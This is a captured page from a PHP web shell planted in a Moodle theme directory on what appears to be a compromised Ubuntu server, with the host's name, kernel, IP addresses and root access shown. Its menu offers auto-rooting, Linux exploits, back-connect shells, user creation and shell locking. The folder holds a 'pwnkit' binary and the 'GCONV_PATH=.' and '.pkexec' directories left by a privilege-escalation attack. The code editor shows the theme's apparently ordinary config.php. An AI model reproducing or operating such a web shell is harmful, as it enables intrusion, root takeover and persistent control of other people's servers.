Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
theme /
essential /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxrwxrwx
jquery
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
layout
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
style
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README.txt
2.04
KB
-rwxrwxrwx
config.php
4.25
KB
-rwxrwxrwx
lib.php
5.62
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
renderers.php
0
B
-rwxrwxrwx
settings.php
19.92
KB
-rwxrwxrwx
version.php
1.31
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * This is built using the Clean template to allow for new theme's using * Moodle's new Bootstrap theme engine * * * @package theme_essential * @copyright 2013 Julian Ridden * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ $THEME->name = 'essential'; // The only thing you need to change in this file when copying it to // create a new theme is the name above. You also need to change the name // in version.php and lang/en/theme_essential.php as well. $THEME->doctype = 'html5'; $THEME->parents = array('bootstrapbase'); $THEME->sheets = array('custom', 'slides', 'font-awesome'); $THEME->supportscssoptimisation = false; $THEME->yuicssmodules = array(); $THEME->editor_sheets = array(); $THEME->plugins_exclude_sheets = array( 'block' => array( 'html', ), 'gradereport' => array( 'grader', ), ); $THEME->layouts = array( // Front page. 'frontpage' => array( 'file' => 'frontpage.php', 'regions' => array('side-pre', 'side-post', 'footer-left', 'footer-middle', 'footer-right', 'hidden-dock'), 'defaultregion' => 'hidden-dock', 'options' => array('nonavbar'=>true), ), // Standard layout with blocks, this is recommended for most pages with general information. 'standard' => array( 'file' => 'general.php', 'regions' => array('side-pre', 'side-post', 'footer-left', 'footer-middle', 'footer-right', 'hidden-dock'), 'defaultregion' => 'side-pre', ), // Course page. 'course' => array( 'file' => 'course.php', 'regions' => array('side-pre', 'side-post', 'footer-left', 'footer-middle', 'footer-right'), 'defaultregion' => 'side-post', 'options' => array('nonavbar'=>false), ), // Page content and modules. 'incourse' => array( 'file' => 'general.php', 'regions' => array('side-pre', 'side-post', 'footer-left', 'footer-middle', 'footer-right'), 'defaultregion' => 'side-pre', ), // Category listing page. 'coursecategory' => array( 'file' => 'general.php', 'regions' => array('side-pre', 'side-post', 'footer-left', 'footer-middle', 'footer-right'), 'defaultregion' => 'side-post', ), // My dashboard page. 'mydashboard' => array( 'file' => 'general.php', 'regions' => array('side-pre', 'side-post', 'footer-left', 'footer-middle', 'footer-right'), 'defaultregion' => 'side-pre', 'options' => array('langmenu'=>true), ), // My public page. 'mypublic' => array( 'file' => 'general.php', 'regions' => array('side-pre', 'side-post', 'footer-left', 'footer-middle', 'footer-right'), 'defaultregion' => 'side-pre', 'options' => array('langmenu'=>true), ), // Public Login page. 'login' => array( 'file' => 'general.php', 'regions' => array('side-pre', 'side-post', 'footer-left', 'footer-middle', 'footer-right'), 'defaultregion' => 'side-pre', 'options' => array('langmenu'=>true), ), // Server administration scripts. 'admin' => array( 'file' => 'general.php', 'regions' => array('side-pre', 'side-post', 'footer-left', 'footer-middle', 'footer-right'), 'defaultregion' => 'side-pre', ), ); $THEME->rendererfactory = 'theme_overridden_renderer_factory'; $THEME->csspostprocess = 'essential_process_css'; $useragent = ''; if (!empty($_SERVER['HTTP_USER_AGENT'])) { $useragent = $_SERVER['HTTP_USER_AGENT']; } if (strpos($useragent, 'MSIE 8') || strpos($useragent, 'MSIE 7')) { $THEME->javascripts[] = 'html5shiv'; };
Close